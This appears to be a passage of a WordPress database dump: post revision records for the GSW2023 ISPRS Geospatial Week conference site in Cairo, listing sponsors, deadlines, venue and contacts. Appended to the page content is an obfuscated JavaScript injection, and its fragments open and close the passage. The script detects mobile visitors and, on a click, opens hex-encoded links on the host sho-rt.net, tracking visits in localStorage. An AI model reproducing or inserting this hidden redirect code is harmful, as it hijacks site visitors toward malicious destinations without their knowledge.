Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-13 17:24:49','2023-04-13 17:24:49','',3066,'https://gsw2023.com/?p=4043',0,'revision','',0),
(4044,1,'2023-04-13 17:29:33','2023-04-13 17:29:33','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406007049{margin-top: px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 